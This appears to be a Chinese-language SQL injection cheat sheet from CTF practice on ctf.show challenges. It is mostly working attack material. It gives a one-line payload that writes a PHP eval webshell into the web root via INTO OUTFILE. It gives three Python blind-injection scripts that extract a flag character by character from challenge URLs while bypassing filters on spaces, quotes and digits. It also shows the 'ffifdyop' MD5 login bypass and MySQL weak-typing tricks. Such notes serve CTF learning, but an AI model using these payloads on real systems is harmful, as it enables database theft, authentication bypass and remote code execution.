
SQL注入-1

過濾某些字元

使用Replace進行替代

如過濾數字

select username, replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(password, 0, '!'), 1, '@'), 2, '#'), 3, '$'), 4, '%'), 5, '^'), 6, '&'), 7, '*'), 8, '('), 9, ')') from user;

直接寫shell

SELECT 1, '<?php @eval($_POST[x]);?>' INTO OUTFILE '/var/www/html/1.php'

bool盲注小指令碼

無空格

import requests
import time


def get_response(result):
    """Extend the known prefix `result` by one character using one probe per candidate.

    For each character in the fixed candidate set, `result + candidate` is
    substituted into the `tableName` parameter and POSTed to `url`. The first
    response whose body contains the literal `$user_count = 1;` (at an offset
    greater than 0 — a match at offset 0 is ignored by the `> 0` test) ends the
    search and the extended prefix is returned.

    Args:
        result: the prefix recovered so far.

    Returns:
        `result` plus the matching character, or None when no candidate matched
        (the caller then gets None, and concatenating on it will fail).
    """
    url = 'http://e952e288-3d6c-4c73-9f3c-9bdf904827d5.challenge.ctf.show/select-waf.php'
    payload = "`ctfshow_user`where`pass`regexp'^{}'"
    dic = 'ctfshow{034e69f-a87bdgijklmnpqruvxyz125_}'
    marker = '$user_count = 1;'
    for candidate in dic:
        body = {'tableName': payload.format(result + candidate)}
        resp = requests.post(url, data=body)
        # Fixed pause after every request; one request per candidate.
        time.sleep(0.25)
        if resp.text.find(marker) > 0:
            return result + candidate


if __name__ == '__main__':
    # Grow the recovered value by one character per call, printing after
    # each step; the call count (55) is a fixed number chosen by the author.
    result = ''
    for _ in range(55):
        result = get_response(result)
        print(result)

有空格無引號

import requests
import time


def str2hex(string):
    """Return `string` as concatenated hex code points with no `0x` prefixes.

    Equivalent to joining `hex(ord(ch))` for every character and deleting the
    `0x` markers: `format(x, 'x')` is exactly `hex(x)` without the prefix.
    Code points below 16 yield a single hex digit, as in the original.

    Args:
        string: the text to encode.

    Returns:
        Lower-case hex string; '' for an empty input.
    """
    return ''.join(format(ord(ch), 'x') for ch in string)

def get_response(result):
    """Extend the known prefix `result` by one character using one probe per candidate.

    `result + candidate` is hex-encoded with `str2hex` and substituted into the
    `tableName` parameter, then POSTed to `url`. The first response containing
    the literal `$user_count = 1;` at an offset greater than 0 (a match at
    offset 0 is ignored by the `> 0` test) ends the search.

    Args:
        result: the prefix recovered so far.

    Returns:
        `result` plus the matching character, or None when no candidate matched
        (the caller then gets None, and concatenating on it will fail).
    """
    url = 'http://61dea855-662d-4843-bd43-4518d01c80f6.challenge.ctf.show/select-waf.php'
    payload = "ctfshow_user group by pass having pass regexp(0x{})"
    dic = 'ctfshow{034e69f-a87bdgijklmnpqruvxyz125_}'
    marker = '$user_count = 1;'
    for candidate in dic:
        encoded = str2hex(result) + str2hex(candidate)
        resp = requests.post(url, data={'tableName': payload.format(encoded)})
        # Fixed pause after every request; one request per candidate.
        time.sleep(0.25)
        if resp.text.find(marker) > 0:
            return result + candidate


if __name__ == '__main__':
    # Grow the recovered value by one character per call, printing after
    # each step; the call count (55) is a fixed number chosen by the author.
    result = ''
    for _ in range(55):
        result = get_response(result)
        print(result)

有空格無引號無數字

import requests
import time

# Decimal digit -> SQL spelling without numeric literals: '0' is `false`,
# and every digit n >= 1 is written as n `true` tokens joined by `+`.
true_dict = {'0': 'false', '1': 'true'}
true_dict.update({str(n): 'true' + '+true' * (n - 1) for n in range(2, 10)})


def word2char(word):
    """Spell the code point of the single character `word` as `char(concat(...))`.

    Each decimal digit of `ord(word)` is looked up in the module-level
    `true_dict`, wrapped in parentheses and comma-joined, e.g. 'a' (97)
    becomes `char(concat((true+...+true),(true+...+true)))`.

    Args:
        word: a one-character string.

    Returns:
        The SQL expression as a str.
    """
    digits = str(ord(word))
    spelled = ','.join('(' + true_dict[d] + ')' for d in digits)
    return 'char(concat(' + spelled + '))'


def sentence2true(string):
    """Return the comma-joined `word2char` expressions for each character of `string`.

    Args:
        string: text to convert; an empty or falsy value yields ''.

    Returns:
        A str such as `char(concat(...)),char(concat(...))`.
    """
    if not string:
        return ''
    return ','.join(word2char(ch) for ch in string)


def get_response(result):
    """Extend the known prefix `result` by one character using one probe per candidate.

    `result + candidate` is rewritten by `sentence2true` and substituted into
    the `tableName` parameter, then POSTed to `url`. The first response
    containing the literal `$user_count = 1;` at an offset greater than 0 (a
    match at offset 0 is ignored by the `> 0` test) ends the search.

    Args:
        result: the prefix recovered so far.

    Returns:
        `result` plus the matching character, or None when no candidate matched
        (the caller then gets None, and concatenating on it will fail).
    """
    url = 'http://283b4efa-e5be-454c-8b79-58af5d20673d.challenge.ctf.show/select-waf.php'
    payload = "ctfshow_user group by pass having pass regexp(concat(char(concat((true+true+true+true+true+true+true+true+true),(true+true+true+true))),{}))"
    dic = 'ctfshow{034e69f-a87bdgijklmnpqruvxyz125_}'
    marker = '$user_count = 1;'
    for candidate in dic:
        encoded = sentence2true(result + candidate)
        resp = requests.post(url, data={'tableName': payload.format(encoded)})
        # Fixed pause after every request; one request per candidate.
        time.sleep(0.25)
        if resp.text.find(marker) > 0:
            return result + candidate


if __name__ == '__main__':
    # Grow the recovered value by one character per call, printing after
    # each step; the call count (55) is a fixed number chosen by the author.
    result = ''
    for _ in range(55):
        result = get_response(result)
        print(result)


ffifdyop 繞過

經過 md5 雜湊後:276f722736c95d99e921722cf9ed621c

再轉換為字串:'or'6<亂碼> 即 'or'66�]��!r,��b

用法

select * from admin where password=''or'6<亂碼>'

就相當於 select * from admin where password='' or 1，實現 sql 注入（字串 '6<亂碼>' 在 or 的數值語境下被 MySQL 隱式轉型為其前導數字 6，結果為真）


MySQL弱型別

select pass from ctfshow_user where username = 0;
# 返回所有字母開頭的字串（非數字開頭的字串隱式轉型為數值 0，故與 0 相等）
select pass from ctfshow_user where username = 1;
# 返回所有隱式轉型後等於數值 1 的字串，即以 1 開頭且其後不再接數字者